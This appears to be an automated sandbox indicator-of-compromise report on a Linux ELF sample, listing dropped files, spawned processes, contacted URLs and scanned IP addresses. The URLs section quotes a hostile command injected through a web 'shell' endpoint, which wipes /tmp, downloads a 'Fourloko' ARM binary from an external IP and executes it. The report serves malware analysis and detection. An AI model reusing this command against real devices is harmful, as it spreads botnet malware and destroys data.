IOC Report

loading gif

Files

File Path
Type
Category
Malicious
1xtO9V8ku8
ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
initial sample
malicious
/var/cache/man/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/cs/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/cs/index.db.OidWsZ
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/da/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/da/index.db.Tx9djV
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/de/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/de/index.db.QeAR9Y
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/es/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/es/index.db.7BpmSY
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/fi/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/fi/index.db.UDmH4W
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/fr.ISO8859-1/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/fr.ISO8859-1/index.db.93HFlX
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/fr.UTF-8/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/fr.UTF-8/index.db.1j2FZY
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/fr/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/fr/index.db.kCK1BY
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/hu/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/hu/index.db.oktA6X
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/id/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/id/index.db.Yrsi7X
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/index.db.C1CCCV
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/it/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/it/index.db.Oz0gYV
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/ja/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/ja/index.db.XKudCZ
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/ko/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/ko/index.db.CHkWlX
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/nl/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/nl/index.db.GufyBY
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/pl/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/pl/index.db.a5HjTW
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/pt/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/pt/index.db.L3jLjW
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/pt_BR/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/pt_BR/index.db.oojnzZ
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/ru/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/ru/index.db.AC78mY
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/sl/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/sl/index.db.pkc8DW
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/sr/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/sr/index.db.S5MaDX
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/sv/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/sv/index.db.NVNacY
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/tr/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/tr/index.db.OMgcpY
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/zh_CN/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/zh_CN/index.db.zJimoZ
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/zh_TW/5419
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/cache/man/zh_TW/index.db.jpfpKZ
GNU dbm 1.x or ndbm database, little endian, 64-bit
dropped
clean
/var/lib/logrotate/status.tmp
ASCII text
dropped
clean
/var/log/cups/access_log.1.gz
gzip compressed data, last modified: Fri Jan 14 22:56:00 2022, from Unix
dropped
clean
/var/log/syslog.1.gz
gzip compressed data, last modified: Fri Jan 14 22:56:01 2022, from Unix
dropped
clean
There are 44 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/1xtO9V8ku8
/tmp/1xtO9V8ku8
clean
/tmp/1xtO9V8ku8
n/a
clean
/tmp/1xtO9V8ku8
n/a
clean
/tmp/1xtO9V8ku8
n/a
clean
/tmp/1xtO9V8ku8
n/a
clean
/tmp/1xtO9V8ku8
n/a
clean
/tmp/1xtO9V8ku8
n/a
clean
/usr/lib/systemd/systemd
n/a
clean
/usr/sbin/logrotate
/usr/sbin/logrotate /etc/logrotate.conf
clean
/usr/sbin/logrotate
n/a
clean
/bin/gzip
/bin/gzip
clean
/usr/sbin/logrotate
n/a
clean
/bin/sh
sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "
clean
/bin/sh
n/a
clean
/usr/sbin/invoke-rc.d
invoke-rc.d --quiet cups restart
clean
/usr/sbin/invoke-rc.d
n/a
clean
/sbin/runlevel
/sbin/runlevel
clean
/usr/sbin/invoke-rc.d
n/a
clean
/usr/bin/systemctl
systemctl --quiet is-enabled cups.service
clean
/usr/sbin/invoke-rc.d
n/a
clean
/usr/bin/ls
ls /etc/rc[S2345].d/S[0-9][0-9]cups
clean
/usr/sbin/invoke-rc.d
n/a
clean
/usr/bin/systemctl
systemctl --quiet is-active cups.service
clean
/usr/sbin/logrotate
n/a
clean
/bin/gzip
/bin/gzip
clean
/usr/sbin/logrotate
n/a
clean
/bin/sh
sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
clean
/bin/sh
n/a
clean
/usr/lib/rsyslog/rsyslog-rotate
/usr/lib/rsyslog/rsyslog-rotate
clean
/usr/lib/rsyslog/rsyslog-rotate
n/a
clean
/usr/bin/systemctl
systemctl kill -s HUP rsyslog.service
clean
/usr/lib/systemd/systemd
n/a
clean
/usr/bin/install
/usr/bin/install -d -o man -g man -m 0755 /var/cache/man
clean
/usr/lib/systemd/systemd
n/a
clean
/usr/bin/find
/usr/bin/find /var/cache/man -type f -name *.gz -atime +6 -delete
clean
/usr/lib/systemd/systemd
n/a
clean
/usr/bin/mandb
/usr/bin/mandb --quiet
clean
There are 27 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://upx.sf.net
unknown
clean
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws
23.133.5.5
clean

IPs

IP
Domain
Country
Malicious
209.143.100.57
unknown
United States
clean
110.111.162.22
unknown
China
clean
70.150.15.221
unknown
United States
clean
53.152.59.75
unknown
Germany
clean
74.52.52.14
unknown
United States
clean
126.127.82.18
unknown
Japan
clean
141.201.89.75
unknown
Austria
clean
108.52.208.147
unknown
United States
clean
220.74.4.214
unknown
Korea Republic of
clean
44.223.156.7
unknown
United States
clean
112.85.175.115
unknown
China
clean
156.49.195.221
unknown
Sweden
clean
48.21.211.95
unknown
United States
clean
192.47.110.8
unknown
Japan
clean
20.219.183.2
unknown
United States
clean
71.19.55.97
unknown
Canada
clean
156.228.63.60
unknown
Seychelles
clean
156.72.230.180
unknown
United States
clean
53.153.108.52
unknown
Germany
clean
104.30.121.98
unknown
United States
clean
50.138.60.221
unknown
United States
clean
38.153.88.159
unknown
United States
clean
80.132.5.126
unknown
Germany
clean
46.56.82.247
unknown
Belarus
clean
204.156.187.82
unknown
United States
clean
47.44.9.235
unknown
United States
clean
62.167.11.173
unknown
Switzerland
clean
67.164.149.29
unknown
United States
clean
166.87.120.234
unknown
Saudi Arabia
clean
58.110.34.63
unknown
Australia
clean
184.89.111.3
unknown
United States
clean
32.173.232.222
unknown
United States
clean
45.130.62.153
unknown
Israel
clean
36.28.252.139
unknown
China
clean
14.112.161.254
unknown
China
clean
2.203.114.164
unknown
Germany
clean
79.93.200.239
unknown
France
clean
129.17.231.111
unknown
United States
clean
220.250.160.228
unknown
China
clean
60.11.198.147
unknown
China
clean
190.45.54.178
unknown
Chile
clean
79.118.248.134
unknown
Romania
clean
168.96.193.109
unknown
Argentina
clean
95.252.144.225
unknown
Italy
clean
142.154.33.75
unknown
Saudi Arabia
clean
176.131.97.133
unknown
France
clean
210.75.10.103
unknown
China
clean
194.16.168.83
unknown
Sweden
clean
167.236.98.20
unknown
United States
clean
32.213.106.159
unknown
United States
clean
120.70.150.33
unknown
China
clean
174.155.124.236
unknown
United States
clean
190.133.162.93
unknown
Uruguay
clean
197.243.99.60
unknown
Rwanda
clean
163.87.229.224
unknown
France
clean
204.12.98.68
unknown
United States
clean
121.30.154.145
unknown
China
clean
151.249.236.209
unknown
Czech Republic
clean
178.91.183.200
unknown
Kazakhstan
clean
186.186.117.84
unknown
Venezuela
clean
158.242.12.252
unknown
United States
clean
40.185.109.192
unknown
United States
clean
104.1.204.68
unknown
United States
clean
5.114.132.141
unknown
Iran (ISLAMIC Republic Of)
clean
44.196.148.250
unknown
United States
clean
53.220.219.81
unknown
Germany
clean
171.43.14.219
unknown
China
clean
53.11.56.88
unknown
Germany
clean
184.2.91.221
unknown
United States
clean
149.27.123.191
unknown
Kazakhstan
clean
44.118.115.167
unknown
United States
clean
93.1.130.80
unknown
France
clean
176.57.79.198
unknown
Russian Federation
clean
59.101.199.215
unknown
Australia
clean
159.91.118.199
unknown
United States
clean
70.140.150.58
unknown
United States
clean
119.106.78.235
unknown
Japan
clean
169.248.203.163
unknown
United States
clean
20.112.77.81
unknown
United States
clean
75.34.155.11
unknown
United States
clean
162.30.206.102
unknown
United States
clean
143.241.129.61
unknown
United States
clean
209.212.174.247
unknown
United States
clean
170.187.70.79
unknown
United States
clean
181.71.150.144
unknown
Colombia
clean
187.87.170.252
unknown
Brazil
clean
207.114.244.32
unknown
United States
clean
177.180.254.130
unknown
Brazil
clean
105.189.12.229
unknown
Morocco
clean
8.107.28.253
unknown
United States
clean
60.248.126.73
unknown
Taiwan; Republic of China (ROC)
clean
41.108.245.6
unknown
Algeria
clean
82.49.65.53
unknown
Italy
clean
19.11.67.72
unknown
United States
clean
118.240.23.117
unknown
Japan
clean
157.197.246.126
unknown
Korea Republic of
clean
166.93.1.104
unknown
Reserved
clean
131.102.76.251
unknown
Switzerland
clean
40.58.230.164
unknown
United States
clean
223.15.201.231
unknown
China
clean
There are 90 hidden IPs, click here to show them.